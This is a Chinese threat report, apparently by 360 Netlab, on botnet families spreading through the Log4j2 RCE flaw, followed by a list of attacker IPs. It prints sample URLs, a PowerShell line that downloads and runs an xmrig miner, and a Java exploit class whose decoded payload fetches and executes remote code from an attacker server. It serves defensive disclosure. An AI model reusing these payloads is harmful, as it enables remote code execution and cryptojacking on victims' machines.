背景介绍
2021年12月11号8点整,我们率先捕获到Muhstik僵尸网络样本通过Log4j2 RCE漏洞传播,并首发披露Mirai和Muhstik僵尸网络在野利用详情[1]。
2天来,我们陆续又捕获到其它家族的样本,目前,这个家族列表已经超过10个,这里从漏洞、payload、攻击IP 和样本分析等几个维度介绍我们的捕获情况。
Apache Log4j2 漏洞攻击分布
360网络安全研究院大网蜜罐系统监测到Apache Log4j2 RCE漏洞(CVE-2021-44228)扫描及攻击,源IP地址地理位置分布如下:
| 国家/地区 | 攻击源IP数量 |
|---|---|
| Germany | 271 |
| The Netherlands | 143 |
| China | 134 |
| United States | 123 |
| United Kingdom | 29 |
| Canada | 27 |
| Singapore | 23 |
| India | 22 |
| Japan | 15 |
| Russia | 12 |
通过对扫描端口分析发现,扫描目的端口主要是8081端口(Apache Flink)占比31.61%,其次是8983端口(Apache Solr)占比28.1%,如下图:
攻击IP溯源分析
我们目前已经捕获超过1050个攻击源IP,主要来自于ALPHASTRIKE-RESEARCH,ASMK和DIGITALOCEAN-ASN,占比50%以上,扫描整体趋势如下:
扫描源IP来自全球各个国家,其中德国占比最大,如下图:
攻击源IP主要为国外大网测绘厂商IP,以及大量Tor代理出口节点IP
攻击源IP来源云厂商分布
样本和Botnet家族分析
目前,我们共捕获到10个家族的恶意样本,这里按照入口样本的维度逐一介绍。
1, Muhstik, DDoS+backdoor
参考我们的上一篇威胁快讯。
2, Mirai
参考我们的上一篇威胁快讯。
3, DDoS家族Elknot
Elknot又名BillGates,最早针对Linux系统,后来被移植到Windows平台。
这2种平台的Elknot我们都有捕获,它们共享同样的C2,显然来自同一团伙。
elknot.ELF的样本信息如下:
URL=http://155.94.154.170/aaa MD5=ded558217c327d8f5c3f8b36118380ab URL=http://155.94.154.170/log4j MD5=ded558217c327d8f5c3f8b36118380ab
elknot.PE的样本信息如下:
URL=http://154.82.110.5:1234/win.exe MD5=36796319567f5a05571006b874903e87
C2均为 300gsyn.it:25009。
4, 挖矿家族m8220
这次传播的是m8220变种,入口样本信息如下:
url= http://205.185.113.59:1234/xmss MD5=75bc0d4022b20fae1f5610109691184e
进一步提取的恶意URL信息如下:
http://agent.apacheorg.top:1234/xmss http://205.185.113.59:1234/.rsyslogds http://205.185.113.59:1234/.inis http://205.185.113.59:1234/xms
5, SitesLoader
这是近期比较活跃的一个Linux家族,这次也搭上了Log4j这个顺风车。入口样本信息::
URL=http://185.250.148.157:8005/acc MD5=933568969efe6b3f8c0621200f0eea5a
最终会下载一个stage 2的ELF文件 payload:
URL=http://185.250.148.157:8005/index MD5=720a3a92e72054dc8d58e229c22bb892 C2="https://sites.google.com/view/maintest01"
6, xmrig.pe
它实际和前述的muhstik共享了同一个exploit,所以应该属于同一团伙,入口exploit对应一个java类:
URL=http://31.220.58.29/Exploit.class MD5=f6e51ea341570c6e9e4c97aee082822b
它能同时攻击Linux和Windows机器,针对Linux的部分就是我们前述的muhstik变种,入口样本信息如下:
URL=http://18.228.7.109/.log/log MD5=1e051111c4cf327775dc3bab4df4bf85
针对Windows平台的入口样本信息如下:
URL=http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd MD5=bf6935865f63c32c0530a61da9b85d53
它指向一个Powershell脚本,核心内容是下载一个xmrig程序并运行:
powershell -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
能看到矿池和钱包地址都硬编码在命令行里了。
7, xmrig.ELF
运行后会下载1个bash脚本和1个xmrig.tar.gz,前者负责解压后者并启动xmrig。样本信息如下:
fseen=2021-12-11 23:45:56 URL=http://129.226.180.53/xmrig_setup/raw/master/xmrig.tar.gz MD5=64808f03e967d15a7907c41fa0d34e89 fseen=2021-12-11 23:39:18 URL=http://129.226.180.53/xmrig_setup/raw/master/setup_c3pool_miner.sh MD5=2f5769c38b6e5f4c59b7d831ed612395
8, 攻击工具1
URL=http://47.243.78.246/12 MD5=5ac6ded41f9a61cd9d026e91af47b695 VT扫描信息:a variant of Linux/Riskware.Meterpreter.C ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped
9, 攻击工具2
URL=http://170.178.196.41:1111/pglQLHfm MD5=29851d65fe14699a793bf401cb84c019 VT扫描信息:a variant of Linux/Riskware.Meterpreter.C ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped URL=http://170.178.196.41:35244/qIoPIauO MD5=eb71a394bcf3e8f83198d51f3f6d7422 VT扫描信息: a variant of Linux/Riskware.Meterpreter.C ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped URL=http://170.178.196.41:8080/UKTPAnRvns MD5=84c2ccc2f2a4d4fe71249bad63252f32 VT扫描信息: Linux/Shellcode.CZ ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
10, 未知PE家族
入口样本基本信息如下:
URL=http://141.98.83.139:9883/exp.class md5=5b30284b34dcc1912326812c7d2ea723
它是一个java类,内容如下:
public class exp
{
public exp()
{
}
static
{
try
{
String as[] = {
"cmd", "/c", "powershell", "-exec", "bypass", "-w", "hidden", "-e", "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABhAGUAQwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABhAGUAQwAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGEAZQBDAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA0ADEALgA5ADgALgA4ADMALgAxADMAOQA6ADEAOAAwADgAMAAvAG4ARwA2ADAAawAxAC8AUgBXAGoAeABGAHcAeABDAEIARQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA0ADEALgA5ADgALgA4ADMALgAxADMAOQA6ADEAOAAwADgAMAAvAG4ARwA2ADAAawAxACcAKQApADsA"
};
Runtime.getRuntime().exec(as).waitFor();
}
catch(Exception exception)
{
exception.printStackTrace();
}
}
}
能看到它会调用powershell解码一个base64串,实际上这个串要经过3次解码才能得到最终的payload,对应一段powershell脚本:
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$aeC=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$aeC.proxy=[Net.WebRequest]::GetSystemWebProxy();$aeC.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).DownloadString('http://141.98.83.139:18080/nG60k1/RWjxFwxCBE'));IEX ((new-object Net.WebClient).DownloadString('http://141.98.83.139:18080/nG60k1'));
里面包含了如下2个URL:
http://141.98.83.139:18080/nG60k1/RWjxFwxCBE http://141.98.83.139:18080/nG60k1
可惜这两个URL均下载失败,所以这里不能提供家族信息。
联系我们
感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。
IoC
部分攻击源IP:
1.116.59.211 1.179.247.182 101.204.24.28 103.103.0.141 103.103.0.142 103.107.198.109 103.232.136.12 103.244.80.194 103.90.239.209 104.244.72.115 104.244.72.136 104.244.73.126 104.244.74.121 104.244.74.57 104.244.76.13 104.244.76.170 104.244.79.234 104.244.79.6 104.248.144.120 107.172.214.23 107.189.1.160 107.189.1.178 107.189.7.88 109.201.133.100 109.70.100.19 109.70.100.34 109.73.65.32 110.42.200.96 111.28.189.51 111.59.85.209 112.215.172.64 112.27.199.180 112.74.52.90 113.141.64.14 113.98.224.68 114.112.161.155 114.32.82.82 115.151.228.235 115.151.228.4 115.151.228.83 118.27.36.56 119.84.170.84 120.195.30.152 120.211.140.116 121.4.56.143 122.117.91.144 122.161.53.44 124.224.87.29 128.199.15.215 128.199.222.221 128.199.48.147 128.31.0.13 131.100.148.7 133.18.201.195 134.122.33.6 134.209.24.42 134.209.82.14 137.184.102.82 137.184.104.73 137.184.105.192 137.184.137.242 137.184.138.79 137.184.28.58 137.184.96.216 137.184.98.176 137.184.99.8 138.197.106.234 138.197.108.154 138.197.167.229 138.197.216.230 138.197.9.239 138.199.21.199 138.68.155.222 139.28.218.134 139.59.101.242 139.59.103.254 139.59.108.31 139.59.163.74 139.59.188.119 139.59.224.7 139.59.8.39 139.59.96.42 139.59.99.80 14.177.141.126 140.246.171.141 141.98.83.139 142.93.151.166 142.93.157.150 142.93.34.250 143.110.221.204 143.110.221.219 143.198.180.150 143.198.183.66 143.198.45.117 143.244.184.81 144.217.86.109 144.48.37.78 145.220.24.19 146.56.131.161 146.56.148.181 146.70.38.48 147.182.131.229 147.182.154.100 147.182.167.165 147.182.179.141 147.182.187.229 147.182.195.250 147.182.215.36 147.182.216.21 147.182.219.9 147.182.242.144 147.182.242.241 150.158.189.96 151.80.148.159 154.65.28.250 154.94.7.88 156.146.57.41 157.230.32.67 157.245.105.213 157.245.107.6 157.245.108.125 157.245.108.40 157.245.109.75 157.245.129.50 157.245.96.165 159.203.187.141 159.203.45.181 159.203.58.73 159.223.42.182 159.223.61.102 159.223.75.133 159.223.9.17 159.48.55.216 159.65.146.60 159.65.155.208 159.65.58.66 159.65.59.77 159.65.60.100 159.89.115.238 159.89.122.19 159.89.133.216 159.89.150.150 159.89.154.102 159.89.154.185 159.89.154.64 159.89.48.173 159.89.85.91 159.89.94.219 160.238.38.196 161.35.119.60 161.35.155.230 161.35.156.13 162.247.74.202 162.247.74.206 162.253.71.51 162.255.202.246 164.52.53.163 164.90.196.7 164.90.199.206 164.90.199.212 164.90.199.216 164.90.200.6 164.92.254.33 165.22.210.174 165.22.213.246 165.227.32.109 165.232.80.166 166.70.207.2 167.172.65.15 167.172.69.97 167.172.71.96 167.172.85.73 167.172.94.250 167.71.1.144 167.71.13.196 167.71.218.228 167.71.4.81 167.86.70.252 167.99.164.160 167.99.172.111 167.99.172.213 167.99.172.99 167.99.186.227 167.99.204.151 167.99.221.217 167.99.36.245 167.99.44.32 170.210.45.163 171.221.235.43 171.25.193.20 171.25.193.25 171.25.193.77 171.25.193.78 172.83.40.103 172.83.40.124 172.98.66.221 174.138.6.128 175.6.210.66 176.10.99.200 177.131.174.12 177.185.117.129 178.128.226.212 178.128.232.114 178.159.3.167 178.17.170.135 178.17.170.23 178.17.171.102 178.17.174.14 178.176.202.121 178.176.203.190 178.62.23.146 178.62.61.47 179.43.187.138 18.27.197.252 180.136.188.219 180.149.125.139 182.99.234.208 182.99.246.166 182.99.246.183 182.99.246.190 182.99.246.192 182.99.246.199 182.99.247.181 182.99.247.188 182.99.247.253 182.99.247.67 183.13.106.232 183.134.110.75 185.100.86.128 185.100.87.174 185.100.87.202 185.100.87.41 185.107.47.171 185.107.47.215 185.107.70.56 185.129.61.5 185.14.97.147 185.165.169.18 185.170.114.25 185.175.25.50 185.202.220.27 185.202.220.29 185.207.249.87 185.220.100.240 185.220.100.241 185.220.100.242 185.220.100.243 185.220.100.244 185.220.100.245 185.220.100.246 185.220.100.247 185.220.100.248 185.220.100.249 185.220.100.250 185.220.100.251 185.220.100.252 185.220.100.253 185.220.100.254 185.220.100.255 185.220.101.129 185.220.101.131 185.220.101.132 185.220.101.133 185.220.101.134 185.220.101.135 185.220.101.136 185.220.101.138 185.220.101.139 185.220.101.140 185.220.101.141 185.220.101.142 185.220.101.143 185.220.101.144 185.220.101.145 185.220.101.146 185.220.101.147 185.220.101.148 185.220.101.149 185.220.101.150 185.220.101.151 185.220.101.152 185.220.101.153 185.220.101.154 185.220.101.155 185.220.101.156 185.220.101.157 185.220.101.158 185.220.101.159 185.220.101.160 185.220.101.161 185.220.101.162 185.220.101.163 185.220.101.164 185.220.101.165 185.220.101.166 185.220.101.167 185.220.101.168 185.220.101.169 185.220.101.170 185.220.101.171 185.220.101.172 185.220.101.173 185.220.101.174 185.220.101.175 185.220.101.176 185.220.101.177 185.220.101.178 185.220.101.179 185.220.101.180 185.220.101.181 185.220.101.182 185.220.101.183 185.220.101.184 185.220.101.185 185.220.101.186 185.220.101.187 185.220.101.188 185.220.101.189 185.220.101.190 185.220.101.191 185.220.101.32 185.220.101.33 185.220.101.34 185.220.101.35 185.220.101.36 185.220.101.37 185.220.101.38 185.220.101.39 185.220.101.40 185.220.101.41 185.220.101.42 185.220.101.43 185.220.101.44 185.220.101.45 185.220.101.46 185.220.101.47 185.220.101.48 185.220.101.49 185.220.101.50 185.220.101.51 185.220.101.52 185.220.101.53 185.220.101.54 185.220.101.55 185.220.101.56 185.220.101.57 185.220.101.58 185.220.101.59 185.220.101.60 185.220.101.61 185.220.101.62 185.220.101.63 185.220.101.9 185.220.102.243 185.220.102.246 185.220.102.248 185.220.102.6 185.220.103.120 185.233.100.23 185.236.200.116 185.236.200.118 185.245.86.85 185.245.87.246 185.255.79.72 185.38.175.130 185.38.175.131 185.38.175.132 185.4.132.183 185.51.76.187 185.56.80.65 185.65.205.10 185.83.214.69 188.166.102.47 188.166.105.150 188.166.170.135 188.166.223.38 188.166.225.104 188.166.45.93 188.166.48.55 188.166.7.245 188.166.86.206 188.166.92.228 188.241.156.207 191.101.132.152 191.232.38.25 192.145.118.111 192.145.118.127 192.145.118.177 192.150.9.201 192.40.57.54 193.110.95.34 193.122.108.228 193.218.118.183 193.218.118.231 193.29.60.202 193.31.24.154 194.110.84.182 194.110.84.243 194.48.199.78 195.144.21.219 195.201.175.217 195.251.41.139 195.54.160.149 197.246.171.83 198.54.128.94 198.98.51.189 198.98.57.207 198.98.62.150 199.195.248.29 199.195.250.77 199.195.252.18 199.249.230.110 199.249.230.163 20.205.104.227 20.71.156.146 20.73.161.16 204.8.156.142 205.185.117.149 206.189.20.141 207.246.101.221 209.127.17.234 209.127.17.242 209.141.34.232 209.141.41.103 209.141.46.203 209.141.54.195 209.141.58.146 209.141.59.180 209.58.146.134 209.97.133.112 211.218.126.140 212.102.40.36 213.164.204.146 217.112.83.246 217.138.200.150 217.138.208.92 217.138.208.94 217.146.83.136 217.79.189.13 218.29.217.234 218.89.222.71 219.100.36.177 219.159.77.109 221.199.187.100 221.226.159.22 221.228.87.37 23.108.92.140 23.128.248.13 23.129.64.130 23.129.64.131 23.129.64.136 23.129.64.137 23.129.64.138 23.129.64.140 23.129.64.141 23.129.64.142 23.129.64.143 23.129.64.144 23.129.64.146 23.82.194.113 23.82.194.114 23.82.194.166 31.171.154.132 31.6.19.41 34.247.50.189 35.193.211.95 35.232.163.113 36.4.92.53 37.120.204.142 37.123.163.58 37.187.122.82 37.187.96.183 37.19.212.103 37.19.212.88 37.19.213.10 37.19.213.148 37.19.213.149 37.19.213.168 37.19.213.170 37.19.213.198 37.19.213.199 37.19.213.200 37.221.66.128 39.102.236.51 41.203.140.114 42.192.69.45 45.12.134.108 45.129.56.200 45.133.194.118 45.137.21.9 45.140.168.37 45.153.160.131 45.153.160.139 45.153.160.2 45.154.255.147 45.155.205.233 45.33.120.240 45.76.99.222 46.101.223.115 46.105.95.220 46.166.139.111 46.194.138.182 46.58.195.62 49.233.62.251 49.234.81.169 49.7.224.217 49.74.65.69 5.157.38.50 5.254.101.167 51.105.55.17 51.15.43.205 51.77.52.216 52.140.215.233 54.146.233.218 58.241.61.242 60.31.180.149 61.175.202.154 61.178.32.114 61.19.25.207 62.102.148.68 62.102.148.69 64.113.32.29 66.220.242.222 67.205.170.85 67.207.93.79 68.183.192.239 68.183.198.247 68.183.198.36 68.183.2.123 68.183.207.73 68.183.33.144 68.183.35.171 68.183.36.244 68.183.37.10 68.183.41.150 68.183.44.143 68.183.44.164 78.31.71.247 78.31.71.248 80.57.9.110 80.67.172.162 81.30.157.43 82.221.131.71 85.93.218.204 86.106.103.29 86.109.208.194 89.163.249.192 89.249.63.3 91.207.173.123 91.207.174.157 91.221.57.179 91.245.81.65 91.250.242.12 92.38.178.27 124.224.87.11 45.83.67.190 121.36.213.142 180.149.231.197 112.74.34.48 128.14.102.187 113.68.61.30 185.220.102.8 180.140.163.156 23.129.64.149 218.28.128.14 54.144.8.103 45.83.66.86 45.83.67.33 45.83.66.36 139.59.4.192 45.83.67.183 103.149.248.27 54.254.58.27 111.205.62.212 45.83.65.148 112.103.102.184 37.120.189.247 147.182.188.183 23.129.64.135 45.83.66.100 45.83.67.58 16.162.192.45 94.230.208.147 182.99.246.138 165.227.37.189 185.220.102.247 223.104.67.7 51.15.244.188 122.161.50.23 111.127.128.136 185.213.155.168 118.112.74.135 185.135.81.158 199.249.230.84 23.129.64.145 13.213.127.204 103.112.31.26 45.83.66.228 45.83.65.93 174.138.9.117 194.87.236.154 167.99.221.249 5.254.43.59 194.110.84.93 51.15.76.60 167.71.14.192 104.244.72.129 211.154.194.21 212.102.50.103 167.99.164.183 45.76.176.24 157.122.61.12 45.83.65.61 211.138.191.69 188.166.26.105 107.189.11.228 172.106.16.74 117.89.128.117 109.70.100.25 101.71.37.47 91.243.81.71 217.68.181.100 195.19.192.26 112.10.117.77 45.83.67.0 5.254.101.169 45.83.64.153 58.247.209.203 45.83.64.235 185.113.128.30 128.199.24.9 137.184.111.180 106.92.114.249 212.193.57.225 112.74.185.158 101.35.199.152 147.182.213.12 45.83.67.64 185.220.101.130 185.4.132.135 114.24.19.243 8.209.212.37 167.99.164.201 23.129.64.134 49.36.231.105 221.222.155.240 113.17.41.134 47.102.199.233 222.128.62.127 38.143.9.76 164.90.159.39 109.237.96.124 121.31.247.58 45.83.64.43 45.83.66.183 122.225.220.134 134.209.153.239 45.83.64.148 172.105.59.246 206.189.29.232 116.206.103.246 116.206.231.53 103.47.48.65 165.232.84.228 172.105.194.173 185.10.68.168 167.99.172.58 58.100.164.147 167.99.188.167 143.198.32.72 52.175.18.172 45.64.75.134 121.229.219.55 18.177.59.255 178.62.222.131 167.71.67.189 45.83.66.65 113.207.68.47 23.234.200.135 134.122.34.28 167.99.216.68 137.184.98.160 45.83.67.22 222.211.205.179 185.193.125.249 45.83.67.77 103.130.166.234 81.17.18.59 104.244.76.44 213.173.34.93 110.191.179.149 23.129.64.133 45.83.64.108 157.245.111.173 45.83.66.130 45.83.65.141 45.83.64.129 62.76.41.46 120.24.23.84 45.83.66.29 107.189.31.195 45.61.184.239 188.166.122.43 165.22.222.120 223.89.64.12 107.189.14.27 45.83.65.82 83.97.20.151 42.159.91.12 118.112.74.218 209.141.45.189 64.188.16.142 172.105.57.210 37.19.213.150 176.10.104.240 185.220.103.116 205.185.125.45 138.68.167.19 101.71.38.231 114.246.35.153 103.194.184.98 45.83.66.134 45.83.66.175 101.89.19.197 152.70.110.78 138.197.72.76 114.254.20.186 203.175.13.14 139.59.97.205 195.123.247.209 117.139.38.130 103.13.220.57 122.161.48.150 45.153.160.133 185.14.47.20 192.144.236.164 45.153.160.140 159.65.43.94 95.141.35.15 116.246.0.93 137.184.109.130 23.154.177.6 45.83.67.234 103.145.22.103 183.160.4.88 77.199.38.33 185.220.101.137 121.24.8.114 115.151.228.18 49.93.83.226 45.83.67.48 66.112.213.87 45.76.191.147 23.129.64.132 138.197.193.220 84.53.225.118 15.165.232.131 185.220.101.128 125.33.172.90 45.83.67.134 101.206.168.120 120.239.67.147 157.245.102.218 45.83.67.75 49.118.75.38 172.105.97.149 117.36.0.131 45.83.67.180 211.148.73.182 36.227.164.189 45.83.65.40 45.83.64.45 167.172.69.175 116.89.189.30 185.220.101.13 23.105.194.3 155.94.151.218 182.99.247.122 54.199.27.97 45.83.65.151 182.118.237.42 36.155.14.163 216.24.191.27 143.110.229.254 203.218.252.81 180.102.206.209 103.149.162.116 101.93.86.68 18.204.199.0 194.195.112.76 47.102.205.237 94.230.208.148 115.60.103.185 45.83.65.76 45.83.64.223 45.83.64.164 198.98.59.65 192.42.116.16 89.238.178.213 185.243.41.202 45.83.65.94 167.99.219.41 13.231.10.223 45.83.67.38 167.99.88.151 199.249.230.119 172.105.194.253 139.59.182.104 123.122.133.12 119.160.234.68 1.209.47.241 115.151.228.146 182.118.237.234 120.228.88.232 178.62.32.211 45.83.67.203 171.218.53.30 185.232.23.46 198.98.60.19